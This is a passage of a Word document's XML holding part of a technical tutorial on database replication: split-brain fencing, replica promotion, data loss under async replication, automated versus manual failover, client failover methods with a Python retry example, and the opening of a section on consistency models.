        <w:t xml:space="preserve">  Partition B: [Original Primary] is still alive and accepting writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1EB6EF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="115C9D82" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Now: TWO primaries accepting writes simultaneously → DATA DIVERGES → CATASTROPHE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29133DEC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fencing (preventing split-brain):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623B5B54" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1521"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>STONITH (Shoot The Other Node In The Head):</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Before promoting replica, ensure old primary is FORCEFULLY shut down (cut power, revoke network, kill process).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2B8221" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1521"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lease-based leadership:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Primary holds a time-limited lease. If it can't renew the lease, it STOPS accepting writes. Replica waits for lease expiry before promoting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122BF2F3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1521"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Epoch/term numbers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Each leader has a monotonically increasing epoch number. Clients reject responses from leaders with old epoch numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B140847" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 Replica Promotion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8E67E2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Choosing which replica to promote:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143405A6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC95BCA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Priority:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D32DDA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  1. Most up-to-date replica (least replication lag — least data loss).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592B308" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  2. Same datacenter as old primary (if possible — reduces client latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EADB2C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  3. Designated preferred replica (pre-configured failover target).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E719B3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="37D1C564" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>PostgreSQL: pg_last_wal_receive_lsn() — which replica has received the most WAL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E4D3F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>MySQL: GTID position — which replica has the latest transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F361B0A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data loss on promotion (async replication):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B82E78" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DB7148" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary committed transactions: T1, T2, T3, T4, T5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0295C023" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica received:              T1, T2, T3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F89E2F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="6DD95601" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary dies. Replica promoted. T4 and T5 are LOST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5488B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Clients that received "success" for T4 and T5 have been lied to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7CD0CA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is the fundamental cost of asynchronous replication.</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> You get low write latency at the cost of potential data loss on failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B62BC7D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Quantifying the risk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E5B87D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E36C46" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Average replication lag: 10ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BDA39A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Writes during lag window: 10ms × 1000 writes/sec = 10 transactions potentially lost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213A338C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="50D84B37" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>With semi-sync (1 replica must ACK):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA5027" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  If the sync replica is promoted → 0 transactions lost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3071B379" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  If a different replica is promoted → potential loss up to the lag to that replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FEF17E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.4 Automated vs. Manual Failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13831BA9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automated failover (typical for production):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C8CE4E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9F4ABE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">Tools: PostgreSQL Patroni, MySQL Group Replication, Redis Sentinel, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43035502" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">       MongoDB Replica Sets, AWS RDS Multi-AZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E0FC79" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="5F42AA7C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B93530E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Monitor detects failure → automatic promotion → DNS/proxy updated → traffic redirected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE60B29" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Time: 15–60 seconds typical (detection + promotion + DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D47243E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manual failover (for safety-critical systems):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D466492" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D0D3C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Monitor alerts human operator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E416241" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Operator verifies primary is truly dead (not a network glitch).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D633EF0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Operator manually promotes replica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13727500" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Operator updates routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FF4590" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Time: minutes to hours (depends on human availability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641C6081" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When to use manual:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAF21BC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1522"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Data loss is unacceptable (want human to verify before promoting a potentially stale replica).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE0036" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1522"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Complex dependencies (need to verify downstream systems are ready).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B0C6E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1522"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Regulatory requirements (change control process for database failover).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C28B8B1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.5 Client Failover Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21424B40" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How clients discover the new primary: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948"/>
        <w:gridCol w:w="4292"/>
        <w:gridCol w:w="2110"/>
      </w:tblGrid>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="7CB1272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4D8DC7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Method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44AF42" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mechanism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045801" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Failover Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="51FA63C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3903A0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>DNS update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4CEAF7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Change DNS record to new primary IP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DED766" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>DNS TTL (30–300s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="00DDFA9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D3CA81" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Virtual IP (VIP)</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0C6339" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Move a floating IP to the new primary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474991" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Seconds (ARP update)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="54A7984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E28409" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Proxy/load balancer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F034AC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Proxy detects primary change, redirects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2182E6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>1–5 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="316372A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89DD1F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Client-side discovery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F4B55F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Client has list of all nodes, finds new primary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DEBF73" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Seconds (retry logic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="188E0C2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31216A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Connection string with multiple hosts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DBCFAD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>host=primary,replica1,replica2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BAF677" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Immediate retry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C75BEC4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application retry logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C242351" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416BCA85" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>def execute_write(query):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F451FF7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    for attempt in range(3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E823CA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B1ED26" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">            connection = get_primary_connection()  # May discover new primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E3B2E2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">            return connection.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F52470A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        except ConnectionError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227C3AA7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">            # Primary unreachable — refresh connection, retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2E15A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">            refresh_primary_discovery()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EBF484" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">            time.sleep(1 * (2 ** attempt))  # Exponential backoff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1035FC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    raise FailoverError("Cannot reach any primary after 3 attempts")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F3C9B6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="14116F29">
          <v:rect id="_x0000_i5644" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8DF155" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Consistency Models in Replicated Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167015C9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 Strong Consistency (Linearizability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65007391" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Every read returns the most recent write. The system behaves as if there's only one copy of the data.</w:t>
      </w:r>
    </w:p>
